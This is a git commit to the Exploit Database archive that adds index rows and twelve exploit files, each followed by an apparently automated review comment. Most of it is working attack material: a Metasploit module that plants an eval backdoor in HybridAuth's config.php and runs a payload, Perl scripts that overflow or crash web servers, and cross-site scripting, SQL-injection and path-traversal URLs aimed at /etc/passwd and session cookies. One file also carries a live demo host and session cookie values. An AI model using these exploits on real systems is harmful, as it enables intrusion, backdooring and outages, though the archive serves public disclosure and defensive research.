Updated 08_23_2014

Offensive Security 2014-08-23 04:40:24 +00:00
parent 059c038e05
commit 414aad7eb0
13 changed files with 415 additions and 0 deletions

@ -30971,3 +30971,15 @@ id,file,description,date,author,platform,type,port
34383,platforms/php/webapps/34383.txt,"Social Media 'index.php' Local File Include Vulnerability",2010-07-27,"Harri Johansson",php,webapps,0
34384,platforms/jsp/webapps/34384.txt,"Jira 4.0.1 Cross Site Scripting and Information Disclosure Vulnerabilities",2010-07-28,MaXe,jsp,webapps,0
34385,platforms/linux/remote/34385.txt,"KVIrc <= 4.0 '\r' Carriage Return in DCC Handshake Remote Command Execution Vulnerability",2010-07-28,unic0rn,linux,remote,0
34386,platforms/php/webapps/34386.txt,"Cetera eCommerce Multiple SQL Injection Vulnerabilities",2010-07-28,MustLive,php,webapps,0
34387,platforms/php/webapps/34387.txt,"Cetera eCommerce Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2010-07-28,MustLive,php,webapps,0
34388,platforms/php/webapps/34388.txt,"SPIP 2.1 'var_login' Parameter Cross Site Scripting Vulnerability",2010-07-28,dotsafe.fr,php,webapps,0
34389,platforms/php/webapps/34389.txt,"Impact Software Ad Peeps Cross Site Scripting and HTML Injection Vulnerabilities",2010-07-27,Matt,php,webapps,0
34390,platforms/php/remote/34390.rb,"HybridAuth install.php PHP Code Execution",2014-08-21,metasploit,php,remote,80
34391,platforms/php/webapps/34391.txt,"Sourcefabric Campsite Multiple Cross Site Scripting Vulnerabilities",2010-07-30,"High-Tech Bridge SA",php,webapps,0
34392,platforms/php/webapps/34392.txt,"MyIT CRM 'index.php' Multiple Cross Site Scripting Vulnerabilities",2010-08-02,"Juan Manuel Garcia",php,webapps,0
34393,platforms/php/webapps/34393.txt,"Joomla! 'com_jigsaw' Component 'controller' Parameter Directory Traversal Vulnerability",2010-08-03,FL0RiX,php,webapps,0
34394,platforms/hardware/dos/34394.pl,"D-Link WBR-2310 1.0.4 Web Server HTTP GET Request Remote Buffer Overflow Vulnerability",2010-08-03,"Rodrigo Escobar",hardware,dos,0
34395,platforms/windows/dos/34395.pl,"PMSoftware Simple Web Server 2.1 'From:' Header Processing Remote Denial Of Service Vulnerability",2010-08-03,"Rodrigo Escobar",windows,dos,0
34396,platforms/php/webapps/34396.txt,"FuseTalk 3.2/4.0 Multiple Cross Site Scripting Vulnerabilities",2010-07-03,"Juan Manuel Garcia",php,webapps,0
34397,platforms/asp/webapps/34397.txt,"Activedition 'activedition/aelogin.asp' Multiple Cross Site Scripting Vulnerabilities",2009-09-25,"Richard Brain",asp,webapps,0
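
Review bot: Two of the new rows disagree with the files they index on the affected version: row 34394 says "D-Link WBR-2310 1.0.4" while 34394.pl states "firmware version 1.04", and row 34396 says "FuseTalk 3.2/4.0" while 34396.txt says only "FuseTalk 4.0 is vulnerable". Use one form for each (the one given in the source advisory) so that searching the CSV and reading the file report the same affected version.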

platforms/asp/webapps/34397.txt Executable file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/42164/info
Activedition is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Activedition 4.0 is vulnerable; other versions may also be affected.
http://www.example.com/activedition/aelogin.asp?status=Fail&noreset=True&workflow='"<script><img src="x" onerror='alert(document.cookie)'&liststatus=&area=&pageid=
http://www.example.com/activedition/aelogin.asp?status=Fail&noreset=True&workflow='"<script><img src="http://www.example.com/images/logo_procheckup.gif&liststatus=&area=&pageid=
http://www.example.com/activedition/aelogin.asp?status=Fail&noreset=True&workflow='"<script><iframe%20src="http://www.example.com" width="600%" height="300%"&liststatus=&area=&pageid=
http://www.example.com/activedition/aelogin.asp?status=&noreset=False&workflow=&liststatus=&area=&pageid='"<script><b>User Name<b><BR><input name="user"><BR><b>Password<b><BR><input type = "password" name="pass"><button onClick="">Log in</button
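
Review bot: The prose never names the injection points; they are only recoverable from the URLs, which place the input in `workflow` (first three examples) and `pageid` (last example). State the affected parameters explicitly, and note that the last URL is the HTML-injection case referred to by the files.csv description, so both vulnerability classes in the row map to a concrete example.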

platforms/hardware/dos/34394.pl Executable file

@ -0,0 +1,36 @@
source: http://www.securityfocus.com/bid/42153/info
D-Link WBR-2310 is prone to a remote buffer-overflow vulnerability because it fails to bounds-check user-supplied input before copying it into an insufficiently sized memory buffer. This issue occurs in the device's webserver.
Exploiting this vulnerability may allow remote attackers to execute arbitrary code in the context of the affected devices webserver.
D-Link WBR-2310 firmware version 1.04 is vulnerable; other versions may also be affected.
#!/usr/bin/perl
use IO::Socket;
if (@ARGV < 1) {
usage();
}
$ip = $ARGV[0];
$port = $ARGV[1];
print "[+] Sending request...\n";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr =>
"$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";
print $socket "GET
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n";
sleep(3);
close($socket);
print "[+] Done!\n";
sub usage() {
print "[-] Usage: <". $0 ."> <host> <port>\n";
print "[-] Example: ". $0 ." 192.168.0.1 80\n";
exit;
}
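
Review bot: The argument check `if (@ARGV < 1)` admits a call with only a host, after which `$port` is undefined and `IO::Socket::INET->new` fails with a generic connect error instead of the usage text; `usage()` itself lists two required arguments, so the test should be `@ARGV < 2`. As a style point, the four description lines above the shebang are bare text rather than `#` comments, which is inconsistent with the `.rb` module in this commit, where the header is commented.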

platforms/php/remote/34390.rb Executable file

@ -0,0 +1,138 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking # application config.php is overwritten
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'HybridAuth install.php PHP Code Execution',
'Description' => %q{
This module exploits a PHP code execution vulnerability in
HybridAuth versions 2.0.9 to 2.2.2. The install file 'install.php'
is not removed after installation allowing unauthenticated users to
write PHP code to the application configuration file 'config.php'.
Note: This exploit will overwrite the application configuration file
rendering the application unusable.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Pichaya Morimoto', # Discovery and PoC
'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
],
'References' =>
[
['EDB', '34273'],
['OSVDB','109838']
],
'Arch' => ARCH_PHP,
'Platform' => 'php',
'Targets' =>
[
# Tested:
# HybridAuth versions 2.0.9, 2.0.10, 2.0.11, 2.1.2, 2.2.2 on Apache/2.2.14 (Ubuntu)
['HybridAuth version 2.0.9 to 2.2.2 (PHP Payload)', {}]
],
'Privileged' => false,
'DisclosureDate' => 'Aug 4 2014',
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to HybridAuth library', '/hybridauth/'])
], self.class)
end
#
# Check:
# * install.php exists
# * config.php is writable
# * HybridAuth version is 2.0.9 to 2.0.11, 2.1.x, or 2.2.0 to 2.2.2
#
def check
res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'install.php')
if !res
vprint_error "#{peer} - Connection failed"
return Exploit::CheckCode::Unknown
elsif res.code == 404
vprint_error "#{peer} - Could not find install.php"
elsif res.body =~ />([^<]+)<\/span> must be <b >WRITABLE</
vprint_error "#{peer} - #{$1} is not writable"
elsif res.body =~ />HybridAuth (2\.[012]\.[\d\.]+(-dev)?) Installer</
version = res.body.scan(/>HybridAuth (2\.[012]\.[\d\.]+(-dev)?) Installer</).first.first
vprint_status "#{peer} - Found version: #{version}"
if version =~ /^2\.(0\.(9|10|11)|1\.[\d]+|2\.[012])/
return Exploit::CheckCode::Vulnerable
else
vprint_error "#{peer} - HybridAuth version #{version} is not vulnerable"
end
end
Exploit::CheckCode::Safe
end
#
# Exploit
#
def exploit
# check vuln
if check != Exploit::CheckCode::Vulnerable
fail_with Exploit::Failure::NotVulnerable, "#{peer} - Target is not vulnerable"
end
# write backdoor
print_status "#{peer} - Writing backdoor to config.php"
payload_param = rand(1000)
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'install.php'),
'data' => "OPENID_ADAPTER_STATUS=eval(base64_decode($_POST[#{payload_param}])))));/*"
)
if !res
fail_with Failure::Unknown, "#{peer} - Connection failed"
elsif res.body =~ /Installation completed/
print_good "#{peer} - Wrote backdoor successfully"
else
fail_with Failure::UnexpectedReply, "#{peer} - Coud not write backdoor to 'config.php'"
end
# execute payload
code = Rex::Text.encode_base64(payload.encoded)
print_status "#{peer} - Sending payload to config.php backdoor (#{code.length} bytes)"
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'config.php'),
'data' => "#{payload_param}=#{code}"
}, 5)
if !res
print_warning "#{peer} - No response"
elsif res.code == 404
fail_with Failure::NotFound, "#{peer} - Could not find config.php"
elsif res.code == 200 || res.code == 500
print_good "#{peer} - Sent payload successfully"
end
# remove backdoor
print_status "#{peer} - Removing backdoor from config.php"
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'install.php'),
'data' => 'OPENID_ADAPTER_STATUS='
)
if !res
print_error "#{peer} - Connection failed"
elsif res.body =~ /Installation completed/
print_good "#{peer} - Removed backdoor successfully"
else
print_warning "#{peer} - Could not remove payload from config.php"
end
end
end
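
Review bot: `check` falls through to `Exploit::CheckCode::Safe` when install.php is reachable but the version regex does not match, so a still-exposed installer with an unrecognised version string is reported as safe; returning `Exploit::CheckCode::Detected` for that branch, and keeping `Safe` only for the 404 and not-writable branches, would make the result reflect what was observed. Two typos: the header comment's download URL is missing its colon (`http//metasploit.com/download`), and the write-step failure message reads "Coud not write backdoor". The final "Removed backdoor successfully" message could also mislead an operator, since the description says config.php is overwritten and the cleanup step only blanks `OPENID_ADAPTER_STATUS` rather than restoring the original file.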

platforms/php/webapps/34386.txt Executable file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/42058/info
Cetera eCommerce is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues can allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Cetera eCommerce 14.0 and previous versions are vulnerable; other versions may also be affected.
The following example URIs are given:
http://www.example.com/cms/templates/banner.php?bannerId=1%20and%20version()=5
http://www.example.com/cms/templates/bannerlist.php?page=-1
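
Review bot: The second URI (`bannerlist.php?page=-1`) is presented as an SQL-injection example but nothing in the hunk says what it produces; without the observed response (a database error, an altered result set) a reader cannot tell an injection from an unvalidated integer. Add the observed effect for each URI; the first at least encodes a testable condition (`version()=5`), the second does not.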

platforms/php/webapps/34387.txt Executable file

@ -0,0 +1,21 @@
source: http://www.securityfocus.com/bid/42059/info
Cetera eCommerce is prone to multiple cross-site-scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
Cetera eCommerce version 14.0 is vulnerable; other versions may also be affected.
http://www.example.com/cms/templates/search.php?q=111&sobject=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/cms/templates/bannerlist.php?deleted=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/cms/templates/bannerlist.php?errorMessage=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/cms/templates/banner.php?errorMessage=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/account/?messageES=s9&messageParam[0]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/cms/index.php?messageES=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/cms/index.php?messageES=s9&messageParam[0]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
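
Review bot: The write-up does not name the affected parameters, and the URLs are the only record of them: `sobject` on search.php, `deleted` and `errorMessage` on bannerlist.php, `errorMessage` on banner.php, and `messageES` / `messageParam[0]` on both /account/ and /cms/index.php. Listing them in the prose, and noting that the same `messageES`/`messageParam[0]` pair is reflected on two different paths, gives a defender a concrete checklist instead of a set of URLs to compare by eye.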


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/42060/info
SPIP is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
SPIP version 2.1.0 is vulnerable; other versions may also be affected.
http://www.example.com/spip.php?page=informer_auteur&var_login[a<script>alert('XSS');</script>a]=aaa
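
Review bot: The description says only that input is not sanitized, but the single example shows the reflected value is the array key of `var_login[...]`, not its value; that detail belongs in the prose, since a fix or filter that only handles parameter values would miss it.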

platforms/php/webapps/34389.txt Executable file

@ -0,0 +1,18 @@
source: http://www.securityfocus.com/bid/42071/info
Impact Software Ad Peeps is prone to multiple cross-site scripting vulnerabilities and multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code could run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
Ad Peeps 8.5d1 is vulnerable; other versions may also be affected.
http://www.example.com/adpeeps/index.php?uid="><script>alert(0)</script>
http://www.example.com/adpeeps/index.php?loc=login_lookup&uid="><script>alert(0)</script>
http://www.example.com/adpeeps/index.php?loc=adminlogin&uid="><script>alert(0)</script>
http://www.example.com/adpeeps/index.php?loc=createcampaign&mode=new&uid=100000&c ampaignid="><script>alert(0)</script>
http://www.example.com/adpeeps/index.php?loc=view_account_stats&uid=100000&type=" ><script>alert(2)</script>&period="><script>alert(1)</script>
http://www.example.com/adpeeps/index.php?loc=view_adrates&uid="><script>alert(0)</script>
http://www.example.com/adpeeps/index.php?loc=account_confirmation&accname="><scri pt>alert(1)</script>&loginpass="><script>alert(2)</script>&uid=100000
http://www.example.com/adpeeps/index.php?loc=setup_account&e6=new&e12=bypass&e9=" ><script>alert(0)</script>
http://www.example.com/adpeeps/index.php?loc=email_advertisers&uid=100000&mode=1& errors=&from="><script>alert(1)</script>&message=&subject="><script>alert(2)</script>
http://www.example.com/adpeeps/index.php?loc=edit_ad_package&uid=100000&idno="><s cript>alert(0)</script>
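
Review bot: Six of the ten URLs (the createcampaign, view_account_stats, account_confirmation, setup_account, email_advertisers and edit_ad_package examples) contain stray spaces inside parameter names and tags (`c ampaignid`, `& errors`, `<scri pt>`, `<s cript>`), which look like line-wrap artifacts carried over from the source advisory; as committed, the parameter names cannot be read reliably. Add a sentence listing the affected parameters in the prose (`uid`, `campaignid`, `type`, `period`, `accname`, `loginpass`, `e9`, `from`, `subject`, `idno`) so the file remains useful even with the wrapped URLs.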

platforms/php/webapps/34391.txt Executable file

@ -0,0 +1,19 @@
source: http://www.securityfocus.com/bid/42107/info
Sourcefabric Campsite is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Sourcefabric Campsite 3.3.6 is vulnerable; prior versions may also be affected.
http://www.example.com/admin/system_pref/do_edit.php?f_campsite_online=Y&f_site_title=Kora"><script>alert(document.cookie)</script>&f_site_metakeywords=11&f_site_metadescription=22&f_cache_enabled=N&f_cache_engine=APC&f_imagecache_lifetime=86400&f_secret_key=1&f_session_lifetime=1400&f_keyword_separator=%2C&f_login_num=3&f_max_upload_filesize=16M&f_smtp_www.example.com=localwww.example.com&f_smtp_port=25&f_editor_image_ratio=100&f_external_subs_management=N&f_use_replication=N&f_db_repl_www.example.com=&f_db_repl_user=&f_db_repl_pass=&f_db_repl_port=3306&f_use_campcaster=N&f_cc_www.example.comname=localwww.example.com&f_cc_www.example.comport=80&f_cc_xrpcpath=%2Fcampcaster%2FstorageServer%2Fvar%2Fxmlrpc%2F&f_cc_xrpcfile=xrLocStor.php&f_template_filter=.*%2C+CVS&save=%D0%A1%D0%BE%D1%85%D1%80%D0%B0%D0%BD%D0%B8%D1%82%D1%8C HTTP/1.1
<form action="http://www.example.com/admin/comments/index.php" method="post" name="main" >
<input type="hidden" name="f_comment_per_page" value="20" >
<input type="hidden" name="f_comment_search" value='1"><script>alert(document.cookie)</script>'>
<input type="hidden" name="f_comment_order_by" value="datestamp">
</form>
<script>
document.main.submit();
</script>
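
Review bot: The long first example has been mangled by the host-scrubbing substitution: `f_smtp_www.example.com=localwww.example.com`, `f_db_repl_www.example.com=`, `f_cc_www.example.comname=localwww.example.com` and `f_cc_www.example.comport=80` are parameter names and values in which the substring "host" was replaced with the placeholder, so the real parameter names are lost, and the line ends in a trailing `HTTP/1.1` that marks it as a pasted request line rather than a URL. Apply the placeholder only to the URL host and keep the parameter names intact; the actual injection points (`f_site_title` in the first example, `f_comment_search` in the auto-submitting form) should be named in the prose.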

platforms/php/webapps/34392.txt Executable file

@ -0,0 +1,52 @@
source: http://www.securityfocus.com/bid/42140/info
MyIT CRM is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
MyIT CRM 0.2.8.1 is vulnerable; other versions may also be affected.
Proof of Concept:
http://XXX.XXX.XXX.XXX/index.php?page=employees:main&page_title=View%20Employees
* The parameter 'name' in the POST request has been set to:
>"'><img%20src%3D%26%23x6a;
%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;
%26%23x70;%26%23x74;%26%23x3a;alert(36078)>
POST /?page=employees:main HTTP/1.0
Cookie: PHPSESSID=5460a3d8ab4f72cc624e1a6744f5ecfd
Content-Length: 159
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: demo.myitcrm.com
Content-Type: application/x-www-form-urlencoded
Referer: http://demo.myitcrm.com/index.php?page=employees:main&page_title=View%20Employees
name=>"'><img%20src%3D%26%23x6a;
%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%2
3x70;%26%23x74;%26%23x3a;alert(36078)>&submit=Search
* The parameter 'employee_id' in the GET request has been set to:
>"'><img%20src%3D%26%23x6a;
%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;
%26%23x70;%26%23x74;%26%23x3a;alert(55255)>
GET /?page=employees:employee_details&employee_id=>"'><img%20src%3D%26%23x6a;
%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%2
3x70;%26%23x74;%26%23x3a;alert(55255)> HTTP/1.0
Cookie: PHPSESSID=4b54d326030a5967e44f5719747a7c86
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: demo.myitcrm.com
Referer: http://demo.myitcrm.com/?page=employees:main
* The parameter 'page' in the POST request has been set to:
>%22%27><img%20src%3d%22javascript:alert(35665)%22>
POST /?page=>%22%27><img%20src%3d%22javascript:alert(35665)%22> HTTP/1.0
Cookie: PHPSESSID=b639ec20245375dcf4b1c3f25dfdf20f
Content-Length: 19
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: demo.myitcrm.com
Content-Type: application/x-www-form-urlencoded
Referer: http://demo.myitcrm.com/index.php?page=employees:main&page_title=View%20Employees
name=&submit=Search
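
Review bot: Redaction is inconsistent within the hunk: the PoC URL uses the `http://XXX.XXX.XXX.XXX/` placeholder, but all three raw requests carry `Host: demo.myitcrm.com` and `Referer: http://demo.myitcrm.com/...`, a third-party demo site, and each includes a live `PHPSESSID` cookie value from the tester's session. Replace the host with the same placeholder used above and blank the cookie values before this is archived.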


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/42144/info
The 'com_jigsaw' component for Joomla! is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks.
http://www.example.com/index.php?option=com_jigsaw&controller=../../../../../../../etc/passwd%00
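
Review bot: This is the only file in the commit with no affected-version statement; every other write-up ends its prose with a "<product> <version> is vulnerable; other versions may also be affected" line, while this one goes straight from the impact sentence to the URL. Add the tested Joomla! and com_jigsaw versions, and since the example relies on a trailing `%00` to terminate the path, state the PHP version it was tested against, as that terminator is runtime-dependent.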

platforms/php/webapps/34396.txt Executable file

@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/42157/info
FuseTalk is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
FuseTalk 4.0 is vulnerable; other versions may also be affected.
http://www.example.com/usersearchresults.cfm?keyword=ttm--"%20><script>alert("TheTestManager.com-
Month of Full disclosure")</script>&FT_ACTION=SearchUsers - (IE8
tested)
or
http://www.example.com/categories.aspx?catid=76&FTVAR_SORT=date&FTVAR_SORTORDER=0017ttm-"
style=x:expression(alert("TheTestManager")) ttm=" (IE7 test)
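
Review bot: The version in the files.csv row ("FuseTalk 3.2/4.0") does not match the prose here ("FuseTalk 4.0 is vulnerable; other versions may also be affected"); reconcile the two. Both examples are also wrapped across lines with the browser note appended to the URL text ("- (IE8 tested)", "(IE7 test)"), and the first targets a `.cfm` page while the second targets `.aspx`, so the write-up should say why the two examples are against different server-side technologies rather than leaving the reader to infer it from the file extensions.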

platforms/windows/dos/34395.pl Executable file

@ -0,0 +1,60 @@
source: http://www.securityfocus.com/bid/42155/info
PMSoftware Simple Web Server is prone to a denial-of-service vulnerability.
Remote attackers can exploit this issue to cause the application to stop responding, denying service to legitimate users.
Simple Web Server 2.1 is vulnerable; other versions may also be affected.
#!/usr/bin/perl
use IO::Socket;
$ip = $ARGV[0];
$port = $ARGV[1];
$conn = $ARGV[2];
$num = 0;
while ( $num <= $conn ) {
system("echo -n .");
$s = IO::Socket::INET->new(Proto => "tcp", PeerAddr =>
"$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";
close($s);
$num++;
}
#!/usr/bin/perl
use Net::HTTP;
if (@ARGV < 1) {
usage();
}
$host = @ARGV[0];
$port = @ARGV[1];
$num = 0;
print "[+] Sending request...\n";
while ($num <= 255) {
my $s = Net::HTTP->new(Host => $host, HTTPVersion => "1.0") || die $@;
$s->write_request(GET => "/", 'User-Agent' => "Mozilla/5.0",
'From' => chr($num));
$num++;
close($s);
}
print "\n[+] Done!\n";
sub usage() {
print "[-] Usage: <". $0 ."> <host> <port>\n";
print "[-] Example: ". $0 ." 127.0.0.1 80\n";
exit;
}
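
Review bot: The hunk is two scripts concatenated, with a second `#!/usr/bin/perl` and `use Net::HTTP` following the first script's loop; committed as one file, both loops run in sequence. Split them or document them as separate PoCs, and fix the argument handling in each: the first loop reads a third argument into `$conn` that the `usage()` text ("<host> <port>") never mentions, and the second assigns `$port = @ARGV[1]` but never passes it to `Net::HTTP->new`, so it always uses the default port regardless of the argument. `@ARGV[0]` and `@ARGV[1]` are one-element array slices used as scalars and should be `$ARGV[0]` and `$ARGV[1]`.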